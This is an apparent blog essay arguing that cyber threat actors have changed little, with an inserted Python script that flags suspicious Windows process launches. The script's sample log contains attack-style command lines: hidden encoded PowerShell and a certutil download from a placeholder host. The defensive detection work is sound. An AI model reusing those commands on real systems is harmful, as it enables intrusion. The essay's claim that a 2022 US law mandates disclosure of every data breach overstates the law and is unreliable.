Stoking fears about the threat landscape is a popular approach, and one that I don’t particularly care for. Many will tell you that the threat landscape is constantly changing, that threats are getting more complex, and that actors are getting more sophisticated.
“The whole world is getting more difficult and scarier, so buy our stuff!”
There’s a ton of media sensationalism too, with the popular image of the hacker sitting at a computer, wearing a dark hoodie. As I’ll discuss here, that image MIGHT only describe one category of threat actor, but really does not apply at all to the others. The reality is both more interesting and more mundane than we give it credit for.
Yes, threat techniques do get more complex over time, but that’s simply a result of the technology arms race between security researchers, defenders, software vendors, OS vendors, etc., and the threat actors who take advantage of more sophisticated techniques. But, in many cases, they don’t. Breaches such as those conducted by the hacker collective LAPSUS$ were pulled off via social engineering, a tactic as old as time (in hacking, of course). Many of them are just good at talking people into giving up the goods.
The tactics that exploit software must get more complex out of necessity. There’s a saying in InfoSec: “Back in my day, we ran code directly on the stack,” which just refers to being able to exploit a bare-metal computer and work directly with the CPU. Things have evolved such that you just can’t do that anymore. There are OS-level protections like address space layout randomization (ASLR) and protected areas of memory, plus the whole concept of a virtual machine (VM). There was no need for something like a virtual machine escape in 1999, because there was no such thing as a virtual machine.
It used to be that if an attacker found one exploitable service, they had root on the machine. To get that same access now, attackers have to chain together five or six different exploits to get around the various protections and mitigations, because those mitigations and protections exist today and they didn’t in the past.
These new techniques are both necessary and difficult to understand. The only people who really get them are malware developers, advanced threat actors, security researchers and the vendors of surveillance software. If you’re a CISO reading about some of these instances of advanced threat techniques, you might think the world is a crazy place and you’re in danger.
That could be true of the software, but it’s not true of the people. Those threat actor groupings are pretty much unchanged in the modern era. The Stuxnet incident, where nation-state actors infiltrated an Iranian uranium enrichment facility and destroyed their centrifuges, was a turning point where we saw advanced persistent threats had gotten to an incredible point. Similarly, ransomware incidents were a turning point in terms of what “cybergangs” could do. But everything’s been pretty stable in terms of threat complexity since then. Insider threats have been around as long as Rolodexes and physical plans for products have been around. You can always steal from your employer, whether maliciously or not. And non-professional hacking enthusiasts have been around for decades too.
Let’s talk about each of these groups of attackers in detail, and look at how they’ve changed, or not changed, throughout the years.
Let’s go back to Stuxnet for a second. It opened the world’s eyes to two nation states that were very, very good at cyber warfare, and kicked their capabilities into real high gear. It tipped everybody off to some of the techniques involved, including that they had designed malware specifically for the systems they attacked.
All of a sudden, it was clear that the cyber warfare that had been predicted had just had very, very real-world consequences. What else had these attackers been up to? And for how long? That was the moment when cyber warfare came into its own in the public eye.
People have been doing scams with computers as long as computers have been in mass adoption, and in my view, ransomware has been pretty stable over the last five to ten years or so.
It sprang up on the scene with high-profile incidents, especially around healthcare. The gangs have evolved how they interact with their victims to a degree, but it’s all incremental change. They have been organized with the same semi-corporate structure for a while. They’ve introduced things like ransomware as a service and affiliate programs, other ways to monetize besides just directly blackmailing a victim into paying a ransom.
These are changes in tactics. Any reasonable corporation is going to change their tactics over time to respond to the business climate, and that’s essentially what ransomware gangs are doing. They’re not cybercriminals out to wreak havoc or steal secrets; they’re just trying to make dough.
Defenders are learning how to control the battle space better to make life difficult for attackers, and buy themselves time to detect those attackers. Technology is getting better. Some of it is an appropriate focus on operating system event logging to detect people, as opposed to some magic EDR thing. I think there’s a constantly improving understanding of how attackers live off the land and how they behave. That’s made life easier.
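To make the point about plain OS event logging concrete, here is an added example (not code from the original post): a small detection pass over constructed process-creation log lines of the kind a stock Windows audit log or Sysmon already records. The log layout, field names and the sample lines are assumptions made up for this example; real 4688/Sysmon records carry more fields and a different format. The three rules are standard behavioural checks a defender would run over such logs, and none needs anything beyond the fields the OS already emits.

```python
"""Toy detection pass over process-creation events (added example, not from the post).

Shows that behavioural detections for living-off-the-land activity can be
written against fields a normal OS audit log already carries: parent process,
image path and command line.  Log format and sample lines are constructed.
"""
from dataclasses import dataclass

# Constructed sample log: "parent | image | command line" per line.
# These are NOT real records; they only exercise the rules below.
SAMPLE_LOG = """\
explorer.exe | C:\\Windows\\System32\\notepad.exe | notepad.exe report.txt
WINWORD.EXE | C:\\Windows\\System32\\cmd.exe | cmd.exe /c powershell -nop -w hidden -enc SQBFAFgA
services.exe | C:\\Windows\\System32\\svchost.exe | svchost.exe -k netsvcs
cmd.exe | C:\\Windows\\System32\\certutil.exe | certutil -urlcache -split -f http://example.invalid/a.txt a.txt
explorer.exe | C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe | powershell Get-ChildItem
"""


@dataclass(frozen=True)
class Event:
    parent: str   # lower-cased parent image name
    image: str    # lower-cased full image path
    cmdline: str  # command line as logged


def parse_line(line: str) -> Event:
    """Split one constructed 'parent | image | cmdline' record into an Event."""
    parent, image, cmdline = (f.strip() for f in line.split(" | ", 2))
    return Event(parent.lower(), image.lower(), cmdline)


def basename(path: str) -> str:
    """Last path component of a Windows-style path."""
    return path.rsplit("\\", 1)[-1]


OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}


def office_spawns_shell(e: Event) -> bool:
    """Document-handling app starting an interpreter is rarely legitimate."""
    return e.parent in OFFICE_APPS and basename(e.image) in SHELLS


def encoded_powershell(e: Event) -> bool:
    """PowerShell launched with an encoded command (-e, -ec, or any prefix of
    -EncodedCommand starting with -en); plain '-ex' (ExecutionPolicy) is excluded."""
    if "powershell" not in e.cmdline.lower():
        return False
    for tok in e.cmdline.split():
        t = tok.lower()
        if t in {"-e", "-ec"}:
            return True
        if t.startswith("-en") and "encodedcommand".startswith(t[1:]):
            return True
    return False


def certutil_download(e: Event) -> bool:
    """certutil used as a downloader via its URL cache switch."""
    return basename(e.image) == "certutil.exe" and "-urlcache" in e.cmdline.lower()


RULES = [
    ("office_spawns_shell", office_spawns_shell),
    ("encoded_powershell", encoded_powershell),
    ("certutil_download", certutil_download),
]


def scan(log_text: str) -> list[tuple[int, str]]:
    """Return (line number, rule name) for every rule that fires on each record."""
    hits: list[tuple[int, str]] = []
    for n, line in enumerate(log_text.splitlines(), 1):
        if not line.strip():
            continue
        event = parse_line(line)
        for name, rule in RULES:
            if rule(event):
                hits.append((n, name))
    return hits


if __name__ == "__main__":
    for lineno, rule_name in scan(SAMPLE_LOG):
        print(f"line {lineno}: {rule_name}")
```

Run as a script it reports the second sample line twice (an Office parent spawning cmd.exe, and an encoded PowerShell command inside it) and the fourth line once (certutil download); the benign lines produce nothing. The rules key on parent/child relationships and command-line tokens rather than file hashes, which is what "control the battle space" looks like in practice: an attacker can rename a payload, but the logged relationship between processes still gives them away.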
The threat of ransomware has not grown more complex. It’s exactly the same as it was five years ago.
For insiders at a company, there’s either malicious intent or negligence. A malicious insider could be disgruntled, or out to try to sell some of your company’s data to a competitor.
Our understanding of insider threats is murky at the corporate level. At the government level, we’ve got whistleblowers who are doing this for supposedly productive or patriotic reasons. When you go down to the broad base of the pyramid of insider threats, it’s everything from a contract employee stealing plans for a mobile device testing machine and selling them to a competitor, to people cracking software for their corporate laptop. Like the other areas I’ve described, this stuff hasn’t meaningfully changed.
If anything, the defense against insider threats has gotten better as the attack surface gets reduced. For insiders, some of that is identity federation. A lot of it is just policy. You know to flag an employee who might steal stuff, and you have them escorted out of the building when you get rid of them. To some degree, maybe data loss prevention has helped, but policy is more important.
Another factor to consider is the advent of BYOD, and versions of zero trust, where your device doesn’t have any inherent trust relationship with the network. Many organizations now are just giving employees a laptop off the shelf, and any work they do is through SaaS platforms and APIs. As a CISO, you don’t actually have to really worry about device management anymore, because if your user infects their device, its access is limited.
For that reason, dealing with insider threats can be easier, and not as complex, as it was in the past.
You would be surprised how many people in infosec got into it because they were bored teenagers. Maybe, like me, they had a couple hours a day unsupervised at home and an obsession with computers. What they actually do with all that time on their hands has evolved through the years, from stealing Internet access to stealing info to playing childish pranks.
They tend to vastly overestimate their own skill, relative to the defender’s ability to thwart them. But every once in a while, through a little cleverness, they can be the teenager that hijacks Twitter’s critical controls and is able to access any account.
You’ll hear scary headlines day in and day out about this stuff. If you don’t have a level of technical literacy, just the sheer volume of cyber incidents might lead you to believe that the world is getting worse. But the reality is that as people gain technical literacy, running stories about cyber incidents becomes more and more of a productive and profitable media strategy. As the saying goes: if it bleeds, it leads.
And yet, as I’ve laid out here, things have gotten better. In the US, Congress passed the Cyber Incident Reporting for Critical Infrastructure Act in 2022 that creates mandatory disclosures of any kind of data breach, which is a very good thing. We can’t manage threats well unless we have a database of incidents, how they happened, and what corrective actions were taken, either at a company level or a general policy level.
A lot of breaches that formerly would’ve been swept under the rug so that a corporation could maintain its reputation are going to make the news. We’re going to hear more and more about them, but that doesn’t mean attacks are getting more complex or that it’s getting more difficult to deal with them. If anything, as we get more defenders into the workforce, it’s going to get easier to combat.